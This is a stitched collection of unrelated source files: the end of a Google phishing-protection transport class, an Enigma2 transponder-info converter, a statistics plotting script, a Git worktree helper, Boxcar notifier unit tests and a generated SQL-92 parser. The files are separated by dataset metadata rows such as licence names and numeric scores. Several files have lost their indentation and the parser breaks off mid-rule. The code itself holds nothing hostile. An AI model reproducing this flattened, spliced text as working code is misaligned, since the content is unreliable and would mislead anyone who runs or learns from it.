cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
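    # Illustration (assuming the caller passed scopes=None):
    #   google-auth >= 1.25.0 -> {"scopes": None, "default_scopes": cls.AUTH_SCOPES}
    #   older google-auth     -> {"scopes": cls.AUTH_SCOPES}
    # i.e. newer versions only fall back to the default scopes when the user
    # supplied none.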
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.report_phishing: gapic_v1.method.wrap_method(
self.report_phishing, default_timeout=600.0, client_info=client_info,
),
}
@property
def report_phishing(
self,
) -> Callable[
[phishingprotection.ReportPhishingRequest],
Union[
phishingprotection.ReportPhishingResponse,
Awaitable[phishingprotection.ReportPhishingResponse],
],
]:
raise NotImplementedError()
__all__ = ("PhishingProtectionServiceV1Beta1Transport",)
|
apache-2.0
| -7,155,690,963,816,367,000
| 38.731429
| 103
| 0.65238
| false
| 4.25
| false
| false
| false
|
oostende/openblachole
|
lib/python/Components/Converter/TransponderInfo.py
|
2
|
2843
|
# -*- coding: utf-8 -*-
from Components.Converter.Converter import Converter
from enigma import iServiceInformation, iPlayableService, iPlayableServicePtr, eServiceCenter
from Components.Element import cached
from ServiceReference import resolveAlternate, ServiceReference
from Tools.Transponder import ConvertToHumanReadable, getChannelNumber
from Components.NimManager import nimmanager
import Screens.InfoBar
class TransponderInfo(Converter, object):
def __init__(self, type):
Converter.__init__(self, type)
self.type = type.split(";")
@cached
def getText(self):
service = self.source.service
if isinstance(service, iPlayableServicePtr):
info = service and service.info()
ref = None
else: # reference
info = service and self.source.info
ref = service
if not info:
return ""
if ref:
nref = resolveAlternate(ref)
if nref:
ref = nref
info = eServiceCenter.getInstance().info(ref)
transponderraw = info.getInfoObject(ref, iServiceInformation.sTransponderData)
else:
transponderraw = info.getInfoObject(iServiceInformation.sTransponderData)
if "InRootOnly" in self.type and not self.rootBouquet():
return ""
if "NoRoot" in self.type and self.rootBouquet():
return ""
if transponderraw:
transponderdata = ConvertToHumanReadable(transponderraw)
if not transponderdata["system"]:
transponderdata["system"] = transponderraw.get("tuner_type", "None")
if not transponderdata["system"]:
return ""
if "DVB-T" in transponderdata["system"]:
return "%s %s %s %s" % (transponderdata["system"], transponderdata["channel"], transponderdata["frequency"], transponderdata["bandwidth"])
elif "DVB-C" in transponderdata["system"]:
return "%s %s %s %s %s" % (transponderdata["system"], transponderdata["frequency"], transponderdata["symbol_rate"], transponderdata["fec_inner"], \
transponderdata["modulation"])
return "%s %s %s %s %s %s %s" % (transponderdata["system"], transponderdata["frequency"], transponderdata["polarization_abbreviation"], transponderdata["symbol_rate"], \
transponderdata["fec_inner"], transponderdata["modulation"], transponderdata["detailed_satpos" in self.type and "orbital_position" or "orb_pos"])
if ref:
result = ref.toString().replace("%3a",":")
else:
result = info.getInfoString(iServiceInformation.sServiceref)
if "://" in result:
return _("Stream") + " " + result.rsplit("://", 1)[1].split("/")[0]
return ""
text = property(getText)
def rootBouquet(self):
servicelist = Screens.InfoBar.InfoBar.instance.servicelist
epg_bouquet = servicelist and servicelist.getRoot()
if ServiceReference(epg_bouquet).getServiceName():
return False
return True
def changed(self, what):
if what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evStart,):
Converter.changed(self, what)
|
gpl-2.0
| -3,631,324,653,382,697,500
| 39.042254
| 172
| 0.724938
| false
| 3.392601
| false
| false
| false
|
Maplenormandy/list-62x
|
python/dataProcessing/generatePlots.py
|
1
|
1362
|
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from statsmodels.stats.weightstats import ttost_paired
data = pd.read_csv(open('combined_data.csv'))
for t in data.index:
if int(data.loc[t, 'Baseline']) == 0:
data.loc[t, 'STF Baseline'] = data.loc[t, 'Succesfully Tracked Features 0']
data.loc[t, 'STF Experiment'] = data.loc[t, 'Succesfully Tracked Features 1']
else:
data.loc[t, 'STF Baseline'] = data.loc[t, 'Succesfully Tracked Features 1']
data.loc[t, 'STF Experiment'] = data.loc[t, 'Succesfully Tracked Features 0']
pvalue, stats1, stats2 = ttost_paired(data['STF Experiment'], data['STF Baseline'], 0, 10000)
print pvalue
print stats1
print stats2
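# ttost_paired runs two one-sided paired t-tests against the equivalence
# bounds low=0 and upp=10000; the first returned value is the larger of the
# two one-sided p-values, so a small pvalue supports equivalence of the two
# tracking conditions within those (deliberately wide) bounds.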
plt.scatter(data.index, data['STF Baseline'], label='baseline')
plt.scatter(data.index, data['STF Experiment'], color="green", label='experiment')
plt.legend(loc='upper right')
plt.draw()
dataMax = max(data['STF Baseline'].max(), data['STF Experiment'].max())
bins = np.linspace(0, dataMax)
plt.figure()
plt.hist(data['STF Baseline'], alpha = 0.5, bins=bins, label="baseline")
plt.hist(data['STF Experiment'], alpha = 0.5, bins=bins, label="experiment")
plt.legend(loc='upper right')
plt.draw()
plt.figure()
plt.hist(data['STF Experiment'] - data['STF Baseline'], bins=30, color="red")
plt.xlabel('Experiment - Baseline')
plt.show()
|
mit
| 3,732,625,034,884,263,400
| 31.428571
| 93
| 0.693098
| false
| 2.935345
| false
| false
| false
|
eduble/panteda
|
sakura/daemon/code/git.py
|
1
|
4338
|
from pathlib import Path
from sakura.common.tools import yield_operator_subdirs, run_cmd
from sakura.common.errors import APIRequestError
GIT_CLONE_TIMEOUT = 60.0 # seconds
GIT_LS_REMOTE_TIMEOUT = 5.0 # seconds
def fetch_updates(code_dir, code_ref):
if code_ref.startswith('branch:'):
remote_ref = code_ref[7:]
elif code_ref.startswith('tag:'):
remote_ref = 'refs/tags/' + code_ref[4:]
try:
run_cmd('git fetch origin %(remote_ref)s' % dict(
remote_ref = remote_ref), cwd=code_dir)
except:
raise APIRequestError('Fetching code failed. Verify given branch or tag.')
def get_worktree(code_workdir, repo_url, code_ref, commit_hash):
code_workdir = Path(code_workdir)
code_workdir.mkdir(parents=True, exist_ok=True)
code_workdir = code_workdir.resolve()
repo_url_path = repo_url.replace('//', '/').replace(':', '')
code_repodir = code_workdir / 'repos' / repo_url_path
# clone if needed
if not code_repodir.exists():
code_repodir.parent.mkdir(parents=True, exist_ok=True)
try:
run_cmd('git clone --no-checkout %(url)s %(dest)s' % dict(
url = repo_url,
dest = code_repodir),
timeout = GIT_CLONE_TIMEOUT)
except:
raise APIRequestError('Cloning repository failed. Verify given URL.')
# get worktree if needed
worktree_dir = code_workdir / 'worktrees' / repo_url_path / commit_hash
if not worktree_dir.exists():
# ensure our local clone knows this commit
fetch_updates(code_repodir, code_ref)
# create the worktree dir
worktree_dir.parent.mkdir(parents=True, exist_ok=True)
try:
run_cmd('git worktree add %(wtdir)s %(commit_hash)s' % dict(
wtdir = worktree_dir,
commit_hash = commit_hash), cwd=code_repodir)
except:
raise APIRequestError('Could not checkout code. Verify given commit hash.')
return worktree_dir
def get_commit_metadata(worktree_dir, commit_hash=None):
cmd = "git log -1 --format='%H%n%at%n%ct%n%ae%n%s'"
if commit_hash != None:
cmd += ' ' + commit_hash
try:
info_lines = run_cmd(cmd, cwd=worktree_dir).splitlines()
except:
raise APIRequestError('Could not find given commit hash.')
commit_hash, s_author_date, s_committer_date, author_email, commit_subject = info_lines
return dict(
commit_hash = commit_hash,
author_date = int(s_author_date),
committer_date = int(s_committer_date),
author_email = author_email,
commit_subject = commit_subject
)
def list_code_revisions(repo_url, ref_type = None):
if ref_type is None:
return list_code_revisions(repo_url, 'tag') + list_code_revisions(repo_url, 'branch')
if ref_type == 'tag':
opt = '--tags'
rev_tags = ()
else: # branches
opt = '--heads'
rev_tags = ('HEAD',)
try:
info = run_cmd("git ls-remote %(opt)s %(url)s" % \
dict(opt = opt, url = repo_url), timeout = GIT_LS_REMOTE_TIMEOUT)
except:
raise APIRequestError('Querying repository failed. Verify given URL.')
words = info.strip().replace('\t', ' ').replace('/', ' ').replace('\n', ' ').split(' ')
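    # Example: an ls-remote line "abc123\trefs/heads/master" flattens to
    # ['abc123', 'refs', 'heads', 'master'], so every 4th word from index 0
    # is a commit hash and every 4th from index 3 is the short ref name.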
commits = words[0::4]
refs = list(ref_type + ':' + w for w in words[3::4])
rev_tags = [ rev_tags ] * len(commits)
return tuple(zip(refs, commits, rev_tags))
def get_last_commit_hash(repo_url, code_ref):
words = code_ref.split(':')
if len(words) != 2 or words[0] not in ('branch', 'tag'):
raise APIRequestError('Invalid code ref.')
short_ref = words[1]
try:
info = run_cmd("git ls-remote %(url)s %(ref)s" % \
dict(url = repo_url, ref = short_ref), timeout = GIT_LS_REMOTE_TIMEOUT)
except:
raise APIRequestError('Querying repository failed. Verify given URL.')
return info.split()[0]
def list_operator_subdirs(code_workdir, repo_url, code_ref):
commit_hash = get_last_commit_hash(repo_url, code_ref)
worktree_dir = get_worktree(code_workdir, repo_url, code_ref, commit_hash)
return sorted(str(op_dir.relative_to(worktree_dir)) \
for op_dir in yield_operator_subdirs(worktree_dir))
|
gpl-3.0
| 5,805,838,144,312,942,000
| 41.116505
| 93
| 0.607653
| false
| 3.464856
| false
| false
| false
|
mrtazz/towbar
|
tests/unit/test_towbar_unit.py
|
1
|
1704
|
# -*- coding: utf-8 -*-
import unittest
import os
import sys
import mock
sys.path.append(os.getcwd())
import towbar
class TestTowbar(unittest.TestCase):
def setUp(self):
self.t = towbar.Towbar("foo", "bar")
def tearDown(self):
pass
@mock.patch('time.time')
@mock.patch('requests.post')
def test_notify_myself_simple(self, mock_requests, mock_time):
mock_time.return_value = 1
data = {'notification[from_screen_name]': 'me',
'notification[message]': 'msg',
'notification[from_remote_service_id]': 1}
self.t.notify_myself("msg", "me")
mock_requests.assert_called_once_with('https://boxcar.io/notifications',
data=data,
auth=("foo", "bar"))
@mock.patch('time.time')
@mock.patch('requests.post')
def test_notify_myself_full(self, mock_requests, mock_time):
mock_time.return_value = 1
data = {'notification[from_screen_name]': 'me',
'notification[message]': 'msg',
'notification[from_remote_service_id]': 1,
"notification[source_url]": "source_url",
"notification[icon_url]": "icon_url",
"notification[sound]": "sound",
"callback": "callback"}
self.t.notify_myself("msg", "me", "source_url", "icon_url", "sound", "callback")
mock_requests.assert_called_once_with('https://boxcar.io/notifications',
data=data,
auth=("foo", "bar"))
if __name__ == '__main__':
unittest.main()
|
mit
| 5,397,757,464,395,163,000
| 34.5
| 88
| 0.524648
| false
| 3.846501
| true
| false
| false
|
vmuriart/sqldef
|
src/parsers/sql1992_grammar.py
|
1
|
124558
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CAVEAT UTILITOR
#
# This file was automatically generated by Grako.
#
# https://pypi.python.org/pypi/grako/
#
# Any changes you make to it will be overwritten the next time
# the file is generated.
from __future__ import print_function, division, absolute_import, unicode_literals
from grako.parsing import graken, Parser
from grako.util import re, RE_FLAGS, generic_main # noqa
__version__ = (2016, 8, 1, 1, 11, 9, 0)
__all__ = [
'SqlParser',
'SqlSemantics',
'main'
]
KEYWORDS = set([])
class SqlParser(Parser):
def __init__(self,
whitespace='\\s+',
nameguard=None,
comments_re='/\\*[\\s\\S]*?\\*/',
eol_comments_re='--.*?$',
ignorecase=True,
left_recursion=True,
keywords=KEYWORDS,
namechars='',
**kwargs):
super(SqlParser, self).__init__(
whitespace=whitespace,
nameguard=nameguard,
comments_re=comments_re,
eol_comments_re=eol_comments_re,
ignorecase=ignorecase,
left_recursion=left_recursion,
keywords=keywords,
namechars=namechars,
**kwargs
)
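    # Typical use of a Grako-generated parser (sketch; rule names follow the
    # _rule_ methods below, minus the surrounding underscores):
    #   ast = SqlParser().parse("DATE '1992-01-01'", rule_name='date_literal')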
@graken()
def _digit_(self):
self._pattern(r'\d+')
@graken()
def _double_quote_(self):
self._token('"')
@graken()
def _quote_(self):
self._token("'")
@graken()
def _left_paren_(self):
self._token('(')
@graken()
def _right_paren_(self):
self._token(')')
@graken()
def _asterisk_(self):
self._token('*')
@graken()
def _plus_sign_(self):
self._token('+')
@graken()
def _comma_(self):
self._token(',')
@graken()
def _minus_sign_(self):
self._token('-')
@graken()
def _period_(self):
self._token('.')
@graken()
def _solidus_(self):
self._token('/')
@graken()
def _colon_(self):
self._token(':')
@graken()
def _semicolon_(self):
self._token(';')
@graken()
def _less_than_operator_(self):
self._token('<')
@graken()
def _equals_operator_(self):
self._token('=')
@graken()
def _greater_than_operator_(self):
self._token('>')
@graken()
def _question_mark_(self):
self._token('?')
@graken()
def _underscore_(self):
self._token('_')
@graken()
def _regular_identifier_(self):
self._pattern(r'[a-z]\w*')
self._check_name()
@graken()
def _delimited_identifier_(self):
self._double_quote_()
self._delimited_identifier_body_()
self._double_quote_()
@graken()
def _delimited_identifier_body_(self):
self._pattern(r'(""|[^"\n])+')
@graken()
def _not_equals_operator_(self):
self._token('<>')
@graken()
def _greater_than_or_equals_operator_(self):
self._token('>=')
@graken()
def _less_than_or_equals_operator_(self):
self._token('<=')
@graken()
def _concatenation_operator_(self):
self._token('||')
@graken()
def _literal_(self):
with self._choice():
with self._option():
self._signed_numeric_literal_()
with self._option():
self._general_literal_()
self._error('no available options')
@graken()
def _unsigned_literal_(self):
with self._choice():
with self._option():
self._unsigned_numeric_literal_()
with self._option():
self._general_literal_()
self._error('no available options')
@graken()
def _general_literal_(self):
with self._choice():
with self._option():
self._character_string_literal_()
with self._option():
self._national_character_string_literal_()
with self._option():
self._bit_string_literal_()
with self._option():
self._hex_string_literal_()
with self._option():
self._datetime_literal_()
with self._option():
self._interval_literal_()
self._error('no available options')
@graken()
def _character_string_literal_(self):
with self._optional():
self._underscore_()
self._character_set_name_()
def block0():
self._quote_()
self._character_representation_()
self._quote_()
self._positive_closure(block0)
@graken()
def _character_representation_(self):
self._pattern(r"(''|[^'\n])*")
@graken()
def _national_character_string_literal_(self):
self._token('N')
def block0():
self._quote_()
self._character_representation_()
self._quote_()
self._positive_closure(block0)
@graken()
def _bit_string_literal_(self):
self._token('B')
def block0():
self._quote_()
with self._optional():
def block1():
self._bit_()
self._positive_closure(block1)
self._quote_()
self._positive_closure(block0)
@graken()
def _hex_string_literal_(self):
self._token('X')
def block0():
self._quote_()
with self._optional():
def block1():
self._hexit_()
self._positive_closure(block1)
self._quote_()
self._positive_closure(block0)
@graken()
def _bit_(self):
self._pattern(r'[01]')
@graken()
def _hexit_(self):
self._pattern(r'[a-f\d]')
@graken()
def _signed_numeric_literal_(self):
with self._optional():
self._sign_()
self._unsigned_numeric_literal_()
@graken()
def _unsigned_numeric_literal_(self):
with self._choice():
with self._option():
self._exact_numeric_literal_()
with self._option():
self._approximate_numeric_literal_()
self._error('no available options')
@graken()
def _exact_numeric_literal_(self):
with self._choice():
with self._option():
self._unsigned_integer_()
with self._optional():
self._period_()
with self._optional():
self._unsigned_integer_()
with self._option():
self._period_()
self._unsigned_integer_()
self._error('no available options')
@graken()
def _sign_(self):
with self._choice():
with self._option():
self._plus_sign_()
with self._option():
self._minus_sign_()
self._error('no available options')
@graken()
def _approximate_numeric_literal_(self):
self._exact_numeric_literal_()
self._token('E')
self._signed_integer_()
@graken()
def _signed_integer_(self):
with self._optional():
self._sign_()
self._unsigned_integer_()
@graken()
def _unsigned_integer_(self):
self._digit_()
@graken()
def _datetime_literal_(self):
with self._choice():
with self._option():
self._date_literal_()
with self._option():
self._time_literal_()
with self._option():
self._timestamp_literal_()
self._error('no available options')
@graken()
def _date_literal_(self):
self._token('DATE')
self._date_string_()
@graken()
def _time_literal_(self):
self._token('TIME')
self._time_string_()
@graken()
def _timestamp_literal_(self):
self._token('TIMESTAMP')
self._timestamp_string_()
@graken()
def _date_string_(self):
self._quote_()
self._date_value_()
self._quote_()
@graken()
def _time_string_(self):
self._quote_()
self._time_value_()
with self._optional():
self._time_zone_interval_()
self._quote_()
@graken()
def _timestamp_string_(self):
self._quote_()
self._date_value_()
self._time_value_()
with self._optional():
self._time_zone_interval_()
self._quote_()
@graken()
def _time_zone_interval_(self):
self._sign_()
self._hours_value_()
self._colon_()
self._minutes_value_()
@graken()
def _date_value_(self):
self._years_value_()
self._minus_sign_()
self._months_value_()
self._minus_sign_()
self._days_value_()
@graken()
def _time_value_(self):
self._hours_value_()
self._colon_()
self._minutes_value_()
self._colon_()
self._seconds_value_()
@graken()
def _interval_literal_(self):
self._token('INTERVAL')
with self._optional():
self._sign_()
self._interval_string_()
self._interval_qualifier_()
@graken()
def _interval_string_(self):
self._quote_()
with self._group():
with self._choice():
with self._option():
self._year_month_literal_()
with self._option():
self._day_time_literal_()
self._error('no available options')
self._quote_()
@graken()
def _year_month_literal_(self):
with self._choice():
with self._option():
self._years_value_()
with self._option():
with self._optional():
self._years_value_()
self._minus_sign_()
self._months_value_()
self._error('no available options')
@graken()
def _day_time_literal_(self):
with self._choice():
with self._option():
self._day_time_interval_()
with self._option():
self._time_interval_()
self._error('no available options')
@graken()
def _day_time_interval_(self):
self._days_value_()
with self._optional():
self._hours_value_()
with self._optional():
self._colon_()
self._minutes_value_()
with self._optional():
self._colon_()
self._seconds_value_()
@graken()
def _time_interval_(self):
with self._choice():
with self._option():
self._hours_value_()
with self._optional():
self._colon_()
self._minutes_value_()
with self._optional():
self._colon_()
self._seconds_value_()
with self._option():
self._minutes_value_()
with self._optional():
self._colon_()
self._seconds_value_()
with self._option():
self._seconds_value_()
self._error('no available options')
@graken()
def _years_value_(self):
self._datetime_value_()
@graken()
def _months_value_(self):
self._datetime_value_()
@graken()
def _days_value_(self):
self._datetime_value_()
@graken()
def _hours_value_(self):
self._datetime_value_()
@graken()
def _minutes_value_(self):
self._datetime_value_()
@graken()
def _seconds_value_(self):
self._unsigned_integer_()
with self._optional():
self._period_()
with self._optional():
self._unsigned_integer_()
@graken()
def _datetime_value_(self):
self._unsigned_integer_()
@graken()
def _identifier_(self):
with self._optional():
self._underscore_()
self._character_set_name_()
self._actual_identifier_()
@graken()
def _identifier_list_(self):
def sep0():
self._token(',')
def block0():
self._identifier_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _actual_identifier_(self):
with self._choice():
with self._option():
self._regular_identifier_()
with self._option():
self._delimited_identifier_()
self._error('no available options')
@graken()
def _table_name_(self):
with self._choice():
with self._option():
self._schema_qualified_name_()
with self._option():
self._qualified_local_table_name_()
self._error('no available options')
@graken()
def _qualified_local_table_name_(self):
self._token('MODULE')
self._period_()
self._identifier_()
@graken()
def _schema_name_(self):
with self._optional():
self._identifier_()
self._period_()
self._identifier_()
@graken()
def _schema_qualified_name_(self):
with self._optional():
self._schema_name_()
self._period_()
self._identifier_()
@graken()
def _parameter_name_(self):
self._colon_()
self._identifier_()
@graken()
def _character_set_name_(self):
with self._optional():
self._schema_name_()
self._period_()
self._regular_identifier_()
@graken()
def _connection_name_(self):
self._simple_value_specification_()
@graken()
def _data_type_(self):
with self._choice():
with self._option():
self._character_string_type_()
with self._optional():
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
with self._option():
self._national_character_string_type_()
with self._option():
self._bit_string_type_()
with self._option():
self._numeric_type_()
with self._option():
self._datetime_type_()
with self._option():
self._interval_type_()
self._error('no available options')
@graken()
def _character_string_type_(self):
with self._choice():
with self._option():
self._token('CHARACTER')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('CHAR')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('CHARACTER')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('CHAR')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('VARCHAR')
self._left_paren_()
self._length_()
self._right_paren_()
self._error('expecting one of: CHAR CHARACTER')
@graken()
def _national_character_string_type_(self):
with self._choice():
with self._option():
self._token('NATIONAL')
self._token('CHARACTER')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NATIONAL')
self._token('CHAR')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NCHAR')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NATIONAL')
self._token('CHARACTER')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NATIONAL')
self._token('CHAR')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NCHAR')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
self._error('expecting one of: NATIONAL NCHAR')
@graken()
def _bit_string_type_(self):
with self._choice():
with self._option():
self._token('BIT')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('BIT')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
self._error('expecting one of: BIT')
@graken()
def _numeric_type_(self):
with self._choice():
with self._option():
self._exact_numeric_type_()
with self._option():
self._approximate_numeric_type_()
self._error('no available options')
@graken()
def _exact_numeric_type_(self):
with self._choice():
with self._option():
self._token('NUMERIC')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._scale_()
self._right_paren_()
with self._option():
self._token('DECIMAL')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._scale_()
self._right_paren_()
with self._option():
self._token('DEC')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._scale_()
self._right_paren_()
with self._option():
self._token('INTEGER')
with self._option():
self._token('INT')
with self._option():
self._token('SMALLINT')
self._error('expecting one of: DEC DECIMAL INT INTEGER NUMERIC SMALLINT')
@graken()
def _approximate_numeric_type_(self):
with self._choice():
with self._option():
self._token('FLOAT')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._option():
self._token('REAL')
with self._option():
self._token('DOUBLE')
self._token('PRECISION')
self._error('expecting one of: DOUBLE FLOAT REAL')
@graken()
def _length_(self):
self._unsigned_integer_()
@graken()
def _precision_(self):
self._unsigned_integer_()
@graken()
def _scale_(self):
self._unsigned_integer_()
@graken()
def _datetime_type_(self):
with self._choice():
with self._option():
self._token('DATE')
with self._option():
self._token('TIME')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._optional():
self._token('WITH')
self._token('TIME')
self._token('ZONE')
with self._option():
self._token('TIMESTAMP')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._optional():
self._token('WITH')
self._token('TIME')
self._token('ZONE')
self._error('expecting one of: DATE TIME TIMESTAMP')
@graken()
def _interval_type_(self):
self._token('INTERVAL')
self._interval_qualifier_()
@graken()
def _value_specification_(self):
with self._choice():
with self._option():
self._literal_()
with self._option():
self._general_value_specification_()
self._error('no available options')
@graken()
def _unsigned_value_specification_(self):
with self._choice():
with self._option():
self._unsigned_literal_()
with self._option():
self._general_value_specification_()
self._error('no available options')
@graken()
def _general_value_specification_(self):
with self._choice():
with self._option():
self._parameter_specification_()
with self._option():
self._question_mark_()
with self._option():
self._token('USER')
with self._option():
self._token('CURRENT_USER')
with self._option():
self._token('SESSION_USER')
with self._option():
self._token('SYSTEM_USER')
with self._option():
self._token('VALUE')
self._error('expecting one of: CURRENT_USER SESSION_USER SYSTEM_USER USER VALUE')
@graken()
def _simple_value_specification_(self):
with self._choice():
with self._option():
self._parameter_name_()
with self._option():
self._literal_()
self._error('no available options')
@graken()
def _parameter_specification_(self):
self._parameter_name_()
with self._optional():
self._indicator_parameter_()
@graken()
def _indicator_parameter_(self):
with self._optional():
self._token('INDICATOR')
self._parameter_name_()
@graken()
def _table_reference_(self):
with self._choice():
with self._option():
self._table_name_()
with self._optional():
self._as_clause_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._subquery_()
self._as_clause_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _column_name_list_(self):
self._identifier_list_()
@graken()
def _column_reference_(self):
with self._optional():
self._qualifier_()
self._period_()
self._identifier_()
@graken()
def _qualifier_(self):
with self._choice():
with self._option():
self._table_name_()
with self._option():
self._identifier_()
self._error('no available options')
@graken()
def _set_function_specification_(self):
with self._choice():
with self._option():
self._token('COUNT')
self._left_paren_()
self._asterisk_()
self._right_paren_()
with self._option():
self._general_set_function_()
self._error('no available options')
@graken()
def _general_set_function_(self):
self._set_function_type_()
self._left_paren_()
with self._optional():
self._set_quantifier_()
self._value_expression_()
self._right_paren_()
@graken()
def _set_function_type_(self):
with self._choice():
with self._option():
self._token('AVG')
with self._option():
self._token('MAX')
with self._option():
self._token('MIN')
with self._option():
self._token('SUM')
with self._option():
self._token('COUNT')
self._error('expecting one of: AVG COUNT MAX MIN SUM')
@graken()
def _set_quantifier_(self):
with self._choice():
with self._option():
self._token('DISTINCT')
with self._option():
self._token('ALL')
self._error('expecting one of: ALL DISTINCT')
@graken()
def _numeric_value_function_(self):
with self._choice():
with self._option():
self._position_expression_()
with self._option():
self._extract_expression_()
with self._option():
self._length_expression_()
self._error('no available options')
@graken()
def _position_expression_(self):
self._token('POSITION')
self._left_paren_()
self._character_value_expression_()
self._token('IN')
self._character_value_expression_()
self._right_paren_()
@graken()
def _length_expression_(self):
with self._choice():
with self._option():
self._char_length_expression_()
with self._option():
self._octet_length_expression_()
with self._option():
self._bit_length_expression_()
self._error('no available options')
@graken()
def _char_length_expression_(self):
with self._group():
with self._choice():
with self._option():
self._token('CHAR_LENGTH')
with self._option():
self._token('CHARACTER_LENGTH')
self._error('expecting one of: CHARACTER_LENGTH CHAR_LENGTH')
self._left_paren_()
self._string_value_expression_()
self._right_paren_()
@graken()
def _octet_length_expression_(self):
self._token('OCTET_LENGTH')
self._left_paren_()
self._string_value_expression_()
self._right_paren_()
@graken()
def _bit_length_expression_(self):
self._token('BIT_LENGTH')
self._left_paren_()
self._string_value_expression_()
self._right_paren_()
@graken()
def _extract_expression_(self):
self._token('EXTRACT')
self._left_paren_()
self._extract_field_()
self._token('FROM')
self._extract_source_()
self._right_paren_()
@graken()
def _extract_field_(self):
with self._choice():
with self._option():
self._datetime_field_()
with self._option():
self._time_zone_field_()
self._error('no available options')
@graken()
def _time_zone_field_(self):
with self._choice():
with self._option():
self._token('TIMEZONE_HOUR')
with self._option():
self._token('TIMEZONE_MINUTE')
self._error('expecting one of: TIMEZONE_HOUR TIMEZONE_MINUTE')
@graken()
def _extract_source_(self):
with self._choice():
with self._option():
self._datetime_value_expression_()
with self._option():
self._interval_value_expression_()
self._error('no available options')
@graken()
def _string_value_function_(self):
with self._choice():
with self._option():
self._character_value_function_()
with self._option():
self._bit_substring_function_()
self._error('no available options')
@graken()
def _character_value_function_(self):
with self._choice():
with self._option():
self._character_substring_function_()
with self._option():
self._fold_()
with self._option():
self._form_of_use_conversion_()
with self._option():
self._character_translation_()
with self._option():
self._trim_function_()
self._error('no available options')
@graken()
def _character_substring_function_(self):
self._token('SUBSTRING')
self._left_paren_()
self._character_value_expression_()
self._token('FROM')
self._start_position_()
with self._optional():
self._token('FOR')
self._string_length_()
self._right_paren_()
@graken()
def _fold_(self):
with self._group():
with self._choice():
with self._option():
self._token('UPPER')
with self._option():
self._token('LOWER')
self._error('expecting one of: LOWER UPPER')
self._left_paren_()
self._character_value_expression_()
self._right_paren_()
@graken()
def _form_of_use_conversion_(self):
self._token('CONVERT')
self._left_paren_()
self._character_value_expression_()
self._token('USING')
self._schema_qualified_name_()
self._right_paren_()
@graken()
def _character_translation_(self):
self._token('TRANSLATE')
self._left_paren_()
self._character_value_expression_()
self._token('USING')
self._schema_qualified_name_()
self._right_paren_()
@graken()
def _trim_function_(self):
self._token('TRIM')
self._left_paren_()
self._trim_operands_()
self._right_paren_()
@graken()
def _trim_operands_(self):
with self._optional():
with self._optional():
self._trim_specification_()
with self._optional():
self._character_value_expression_()
self._token('FROM')
self._character_value_expression_()
@graken()
def _trim_specification_(self):
with self._choice():
with self._option():
self._token('LEADING')
with self._option():
self._token('TRAILING')
with self._option():
self._token('BOTH')
self._error('expecting one of: BOTH LEADING TRAILING')
@graken()
def _bit_substring_function_(self):
self._token('SUBSTRING')
self._left_paren_()
self._bit_value_expression_()
self._token('FROM')
self._start_position_()
with self._optional():
self._token('FOR')
self._string_length_()
self._right_paren_()
@graken()
def _start_position_(self):
self._numeric_value_expression_()
@graken()
def _string_length_(self):
self._numeric_value_expression_()
@graken()
def _datetime_value_function_(self):
with self._choice():
with self._option():
self._token('CURRENT_DATE')
with self._option():
self._current_time_value_function_()
with self._option():
self._current_timestamp_value_function_()
self._error('expecting one of: CURRENT_DATE')
@graken()
def _current_time_value_function_(self):
self._token('CURRENT_TIME')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
@graken()
def _current_timestamp_value_function_(self):
self._token('CURRENT_TIMESTAMP')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
@graken()
def _case_expression_(self):
with self._choice():
with self._option():
self._case_abbreviation_()
with self._option():
self._case_specification_()
self._error('no available options')
@graken()
def _case_abbreviation_(self):
with self._choice():
with self._option():
self._token('NULLIF')
self._left_paren_()
self._value_expression_()
self._comma_()
self._value_expression_()
self._right_paren_()
with self._option():
self._token('COALESCE')
self._left_paren_()
self._value_expression_()
def block0():
self._comma_()
self._value_expression_()
self._positive_closure(block0)
self._right_paren_()
self._error('no available options')
@graken()
def _case_specification_(self):
with self._choice():
with self._option():
self._simple_case_()
with self._option():
self._searched_case_()
self._error('no available options')
@graken()
def _simple_case_(self):
self._token('CASE')
self._value_expression_()
def block0():
self._simple_when_clause_()
self._positive_closure(block0)
with self._optional():
